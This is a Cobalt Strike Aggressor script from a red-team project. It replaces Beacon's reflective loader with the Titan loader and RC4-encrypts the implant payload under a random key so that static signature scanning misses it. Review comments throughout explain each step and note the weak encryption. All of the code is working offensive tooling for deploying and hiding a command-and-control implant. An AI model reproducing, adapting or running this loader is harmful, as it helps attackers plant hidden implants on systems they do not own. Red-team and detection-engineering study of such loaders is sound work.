forked from realoriginal/titanldr-ng
Titan.cna
##
## Reflective Loader
##
## GuidePoint Security LLC
##
## Threat and Attack Simulation
##
import javax.crypto.spec.*;
import java.security.*;
import javax.crypto.*;
##
## Generates a random string ( @offsecginger )
##
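sub random_string {
    # Build a string of $1 characters drawn uniformly from the ASCII letters
    # a-z and A-Z, and return it. A length of 0 yields the empty string.
    #
    # Working variables are declared local so the call does not overwrite
    # same-named globals in the calling script (Sleep variables are global
    # unless declared otherwise).
    #
    # NOTE(review): rand() is a general-purpose generator, presumably not a
    # cryptographic one, and the alphabet has only 52 symbols. Treat the
    # result as an identifier or obfuscation value, not as a secret.
    local('$limit $alphabet $result $i');

    $limit    = $1;
    $alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $result   = "";

    for ($i = 0; $i < $limit; $i++) {
        # rand(n) with an integer argument picks an index in [0, n)
        $result .= charAt($alphabet, rand(strlen($alphabet)));
    }

    return $result;
}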
##
## Inserts titan into Beacon
##
set BEACON_RDLL_GENERATE {
##
## Cobalt Strike hook that supplies a user-defined reflective loader.
## As used below: $2 is the incoming payload buffer and $3 selects which
## Titan.<$3>.bin blob is read (presumably the architecture string --
## confirm against the hook documentation). $1 is not used here.
## Returning $null makes Cobalt Strike fall back to its standard loader,
## as the warning messages below state.
##
## Output layout, as assembled at the end of this block:
##   [ Titan blob ][ 4-byte length of $buf ][ 16-character key ][ $buf ]
##
## NOTE(review): the key is written in the clear directly in front of the
## data it covers and is also printed to the console. The RC4 pass hides
## the buffer from static content matching only; it gives no
## confidentiality, and anyone holding the output can reverse it.
##
##
## Read the pre-built Titan blob for the requested variant from the
## script's resource directory.
##
$hnd = openf( script_resource( "Titan.". $3 .".bin" ) );
$ldr = readb( $hnd, -1 );
closef( $hnd );
if ( strlen( $ldr ) == 0 ) {
##
## Nothing was read: Titan was not compiled (presumably this also
## covers a missing or unreadable file -- openf errors are not
## checked separately).
##
warn( 'titan has not been compiled, using standard cobalt loader.' );
return $null;
};
## Pull the active C2 profile so incompatible stage options can be rejected.
$prf = data_query( "metadata" )["c2profile"];
if ( [ $prf getString: ".stage.sleep_mask" ] eq "true" ) {
if ( [ $prf getString: ".stage.obfuscate" ] eq "false" ) {
##
## sleep_mask = true together with obfuscate = false is not
## supported by Titan; refuse and let the default loader be used.
##
warn( 'titan cannot be used with sleep_mask if obfuscate is set to false' );
return $null;
};
};
##
## Print the banner to the script console. (The original comment
## here mentions prompting for workstation or other tweaks; no such
## prompt exists in this block.)
##
println( ' ___________________ _ __' );
println( '/_ __/ _/_ __/ _ | / |/ /' );
println( '/ / _/ / / / / __ |/ / ' );
println( '/_/ /___/ /_/ /_/ |_/_/|_/ ' );
println( '============================' );
println( 'Reflective Loader by Austin ' );
println( 'GuidePoint Security LLC' );
println( '============================' );
##
## Run the incoming buffer through RC4 under a fresh 16-character
## key, then build the header that tells Titan the buffer length
## and the key.
##
## DECRYPT_MODE is used, but RC4 is a symmetric stream cipher, so
## the transform is the same one ENCRYPT_MODE would apply.
##
$str = random_string( "16" );
$cip = [ Cipher getInstance: "RC4" ];
$key = [ new SecretKeySpec: $str, "RC4" ];
[ $cip init: [ Cipher DECRYPT_MODE ], $key ];
$buf = [ $cip doFinal: $2 ];
## 4-byte unsigned length prefix; the '+' modifier fixes the byte order
## (presumably big-endian in Sleep's pack() -- confirm against the loader).
$inf = pack( 'I+', strlen( $buf ) );
$inf .= $str . $buf;
## NOTE(review): this writes the key itself to the script console.
println( "ARC4: ". $str );
println( "SIZE: ". strlen( $ldr . $inf ) );
##
## Return the Titan blob followed by the header and transformed buffer.
##
return $ldr . $inf;
};
##
## Size
##
set BEACON_RDLL_SIZE {
## Hook queried by Cobalt Strike for the reflective-loader space to reserve.
## Always answers the string "0". Presumably this requests a payload with
## no reserved loader space, which fits BEACON_RDLL_GENERATE prepending
## the Titan blob to the buffer instead of patching it into the payload --
## confirm the accepted values against the Cobalt Strike version in use.
return "0";
};